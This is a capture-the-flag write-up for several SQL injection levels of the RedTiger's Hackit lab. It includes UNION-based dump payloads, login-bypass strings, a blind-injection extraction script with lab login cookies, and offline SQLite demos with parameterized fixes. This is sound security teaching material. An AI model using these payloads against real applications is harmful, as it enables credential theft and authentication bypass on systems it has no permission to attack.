RedTiger's Hackit
Web security: SQL injection
level 1
https://redtiger.labs.overthewire.org/level1.php
The query result is echoed, so append a union select (the table name level1_users is known; the original query returns four columns, so the union must supply four as well):
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users
level 2
https://redtiger.labs.overthewire.org/level2.php
A simple loginbypass
Target: Login
Hint: Condition
Bypass the login with a single quote that closes the string literal and a condition that is always true.
username: admin' or '1'='1    (always true)
password: 'or 1=1#    (always true; # starts a MySQL comment, so the rest of the original query is discarded)
username=admin' or '1'='1&password='or 1=1#&login=Login
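The level 1 and level 2 payloads above, replayed against a local SQLite database so the injected queries can be inspected offline. This is an added example, not code from the page or from RedTiger: the tables, rows and credentials are constructed, the query shapes are assumed (a four-column news query selected by cat for level 1, a quoted username/password comparison for level 2), and because SQLite has no MySQL `#` comment the level 2 password payload uses `-- ` in its place. The parameterized variants next to each vulnerable query show what stops the payload.

```python
import sqlite3

# Payloads as used on the page for level 1 and level 2.
LEVEL1_CAT = "1 union select 1,2,username,password from level1_users"
LEVEL2_USERNAME = "admin' or '1'='1"
# The page's password payload is 'or 1=1#; SQLite has no '#' comment, so '-- ' stands in for it.
LEVEL2_PASSWORD = "'or 1=1-- "


def make_db():
    """Constructed sample data; only the table name level1_users comes from the page."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, cat INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 1, 'first post', 'hello'), (2, 2, 'other category', 'bye');
        CREATE TABLE level1_users (username TEXT, password TEXT);
        INSERT INTO level1_users VALUES ('alice', 's3cret');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'correct-horse');
    """)
    return db


def news_by_cat_vulnerable(db, cat):
    # Level 1 shape: cat is pasted into the query text, so a trailing UNION with
    # the same column count (four) is executed as SQL and its rows are echoed too.
    sql = "SELECT id, cat, title, body FROM news WHERE cat=" + cat
    return db.execute(sql).fetchall()


def news_by_cat_safe(db, cat):
    # Validate the type, then bind the value: it is never parsed as SQL.
    try:
        cat_id = int(cat)
    except ValueError:
        return []
    return db.execute("SELECT id, cat, title, body FROM news WHERE cat=?", (cat_id,)).fetchall()


def login_vulnerable(db, username, password):
    # Level 2 shape: both fields are quoted into the WHERE clause. The username payload
    # closes its quote and ORs in a true condition; the password payload does the same
    # and comments out the dangling closing quote.
    sql = "SELECT username FROM users WHERE username='%s' AND password='%s'" % (username, password)
    return db.execute(sql).fetchone() is not None


def login_safe(db, username, password):
    row = db.execute("SELECT username FROM users WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row is not None


def demo():
    db = make_db()
    return {
        "level1_vulnerable": news_by_cat_vulnerable(db, LEVEL1_CAT),
        "level1_safe": news_by_cat_safe(db, LEVEL1_CAT),
        "level2_vulnerable": login_vulnerable(db, LEVEL2_USERNAME, LEVEL2_PASSWORD),
        "level2_safe": login_safe(db, LEVEL2_USERNAME, LEVEL2_PASSWORD),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The vulnerable level 1 query returns the constructed user row (1, 2, 'alice', 's3cret') next to the real news row, which is exactly the echo the page relies on; the vulnerable login returns true for a non-existent password because the injected `or 1=1` short-circuits the check.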
level 3
https://redtiger.labs.overthewire.org/level3.php
urlcrypt.inc (the usr parameter is encoded with it; each payload below is shown in clear and as its encoded usr value)
Step 1, find the column count with order by (the trailing "-- " comments out the rest of the query):
Admin' order by 7-- +
Encrypted:
https://redtiger.labs.overthewire.org/level3.php?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDc2MTc2MDc0MDM4
Step 2, union select with seven columns to see which of them are echoed on the page:
1' union select 1,2,3,4,5,6,7#
Encrypted:
https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MTc1MDcwMDYyMTk5MjM1MjE5MDgxMjQ2MTUyMjA4MTc4MTEx
Step 3, put username and password into the echoed columns (2 and 6); 0x41646d696e is 'Admin' as a hex literal, so no quote characters are needed in the payload:
1' union select 1,username,3,4,5,password,7 from level3_users where username=0x41646d696e#
Encrypted:
https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MjMyMDI1MTA0MTUzMTc3MTUwMDA5MTkxMTMwMjA3MTY5MTIwMTUzMTk3MDQwMTA0MTc3MTQ5MjA5MTg0MTEzMDU0MTgwMjA4MTE4MjE4MTcwMTc4MDE1MTk4MDAyMTQ2MTE1MDcwMTQzMTU0MDI3MDE3MTY1MTY0MDQ3MDM2MDgwMjIzMDQ4MDc5MTI1MTAxMTA3MTU1MTQ2MDk0MTU0MjAyMDY4MDMyMjIzMTQ3MDYzMDM1MjE4MDE3MDM1MTQzMDk3MjAyMjAzMDc1MTE1MTgyMDQ5MTgy
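The three usr values above, inspected offline. This is an added example, not code from the page or from RedTiger, and it does not reproduce the urlcrypt.inc cipher (the page does not show it): it only strips the outer layer, base64 around fixed-width 3-digit decimal groups, and checks two properties that the page's own samples exhibit. It also shows the hex-literal trick used in step 3.

```python
import base64
from itertools import combinations

# Payloads and their encoded usr values, copied from the level 3 write-up above.
PAYLOADS = {
    "Admin' order by 7-- +":
        "MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDc2MTc2MDc0MDM4",
    "1' union select 1,2,3,4,5,6,7#":
        "MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MTc1MDcwMDYyMTk5MjM1MjE5MDgxMjQ2MTUyMjA4MTc4MTEx",
    "1' union select 1,username,3,4,5,password,7 from level3_users where username=0x41646d696e#":
        "MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MjMyMDI1MTA0MTUzMTc3MTUwMDA5MTkxMTMwMjA3MTY5MTIwMTUzMTk3MDQwMTA0MTc3MTQ5MjA5MTg0MTEzMDU0MTgwMjA4MTE4MjE4MTcwMTc4MDE1MTk4MDAyMTQ2MTE1MDcwMTQzMTU0MDI3MDE3MTY1MTY0MDQ3MDM2MDgwMjIzMDQ4MDc5MTI1MTAxMTA3MTU1MTQ2MDk0MTU0MjAyMDY4MDMyMjIzMTQ3MDYzMDM1MjE4MDE3MDM1MTQzMDk3MjAyMjAzMDc1MTE1MTgyMDQ5MTgy",
}


def mysql_hex_literal(s):
    """'Admin' -> 0x41646d696e: a MySQL hex literal needs no quote characters,
    which is why the step 3 payload can compare username against it."""
    return "0x" + s.encode("latin-1").hex()


def decode_usr(usr):
    """Strip the outer layer of a usr value: base64, then 3-digit decimal groups.
    The urlcrypt.inc cipher itself is not reproduced; this only exposes its output."""
    raw = base64.b64decode(usr, validate=True).decode("ascii")
    if len(raw) % 3 or not raw.isdigit():
        raise ValueError("usr is not a run of 3-digit groups")
    return [int(raw[i:i + 3]) for i in range(0, len(raw), 3)]


def check_structure(payloads=PAYLOADS):
    """Two properties visible in the page's three samples: one group per payload
    character, and equal characters at equal positions give equal groups (so the
    cipher is a per-position substitution, at least over these samples)."""
    codes = {p: decode_usr(u) for p, u in payloads.items()}
    for p, c in codes.items():
        if len(c) != len(p):
            return False
    for (p1, c1), (p2, c2) in combinations(codes.items(), 2):
        for i in range(min(len(p1), len(p2))):
            if p1[i] == p2[i] and c1[i] != c2[i]:
                return False
    return True


if __name__ == "__main__":
    print(mysql_hex_literal("Admin"))
    for p, u in PAYLOADS.items():
        print(len(p), decode_usr(u))
    print(check_structure())
```

The length check is the practical use: when a usr value comes back from the site, the number of groups tells you how many characters the server saw, so a payload that was truncated or had a character stripped is spotted before anything is decoded.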
level 7
Boolean-based blind injection through the search field: the author of a news row (news.autor) is extracted one character at a time. Each request asks whether the character at position i is c; the first i-1 characters are masked with insert() so a repeated character cannot satisfy locate() early, COLLATE latin1_general_cs makes the comparison case-sensitive, and a hit is recognised by the string FRANCISCO appearing in the response.

# -*- coding: utf-8 -*-
import requests
import re

data = ''
url = "http://redtiger.labs.overthewire.org/level7.php"
# One request per (character, position): true when the first occurrence of the
# character in news.autor, with the first i-1 characters replaced by '*', is at position i.
search_template = "google%' and locate('{0}',insert(news.autor,1,{1},'{2}') COLLATE latin1_general_cs)={3} and '%'='"
# Login cookies for the earlier levels, needed to reach level 7.
cookies = {
    "level2login": "passwords_will_change_over_time_let_us_do_a_shitty_rhyme",
    "level3login": "feed_the_cat_who_eats_your_bread",
    "level4login": "put_the_kitten_on_your_head",
    "level5login": "this_hack_it%27s_old",
    "level6login": "the_stone_is_cold",
    "level7login": "shitcoins_are_hold"
}
payloads = {
    "level7login": "Login",
    "password": "shitcoins_are_hold",
    "dosearch": "search!"
}
for i in range(1, 18):                      # positions 1..17
    mask = '*' * (i - 1)
    for c in range(32, 127):                # printable ASCII candidates
        if i != 1:
            payloads["search"] = search_template.format(chr(c), i - 1, mask, i)
        else:
            payloads["search"] = "google%' and locate('{0}',news.autor COLLATE latin1_general_cs)=1 and '%'='".format(chr(c))
        response = requests.post(url, cookies=cookies, data=payloads)
        print(payloads)
        html = response.text
        match = re.search('FRANCISCO', html)    # present only when the injected condition is true
        if match:
            data = data + chr(c)
            print(data)
            break
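The extraction loop of the level 7 script, run against a local oracle instead of the site so the masking trick can be checked offline. This is an added example, not code from the page or from RedTiger; the author value is constructed, and the oracle functions emulate the MySQL expressions in Python (str.find is case-sensitive, matching the _cs collation). The naive oracle shows what goes wrong without the insert() mask: extraction stops at the first repeated character.

```python
# Constructed sample value; the real news.autor is not on the page.
SECRET_AUTHOR = "Anna Marie"

# The search string the script sends (same template as in the script above).
SEARCH_TEMPLATE = ("google%' and locate('{0}',insert(news.autor,1,{1},'{2}') "
                   "COLLATE latin1_general_cs)={3} and '%'='")


def payload_for(ch, pos):
    """Search value that tests 'character ch is at 1-based position pos'."""
    return SEARCH_TEMPLATE.format(ch, pos - 1, "*" * (pos - 1), pos)


def masked_oracle(author, ch, pos):
    """Emulates locate(ch, insert(author,1,pos-1,'*'*(pos-1)) COLLATE latin1_general_cs) = pos:
    the first pos-1 characters are blanked out, so an earlier copy of ch cannot satisfy locate()."""
    masked = "*" * (pos - 1) + author[pos - 1:]
    return masked.find(ch) + 1 == pos


def naive_oracle(author, ch, pos):
    """locate(ch, author) = pos without the mask: locate() reports only the first occurrence."""
    return author.find(ch) + 1 == pos


def extract(oracle, max_len=64):
    """Recover the string one character at a time; stop when no candidate matches."""
    data = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            ch = chr(code)
            if ch in "'\\":
                continue    # would break the quoted literal in the real payload
            if oracle(ch, pos):
                data += ch
                break
        else:
            break           # no character matched at this position: end of string
    return data


if __name__ == "__main__":
    print(payload_for("F", 3))
    print(extract(lambda ch, pos: masked_oracle(SECRET_AUTHOR, ch, pos)))   # Anna Marie
    print(extract(lambda ch, pos: naive_oracle(SECRET_AUTHOR, ch, pos)))    # An
```

With the mask the whole value is recovered and the loop terminates on its own when no candidate matches, which is what replaces the fixed 17 iterations of the script; without it the second 'n' of "Anna" is already invisible to locate(), so nothing matches at position 3 and the result is cut short.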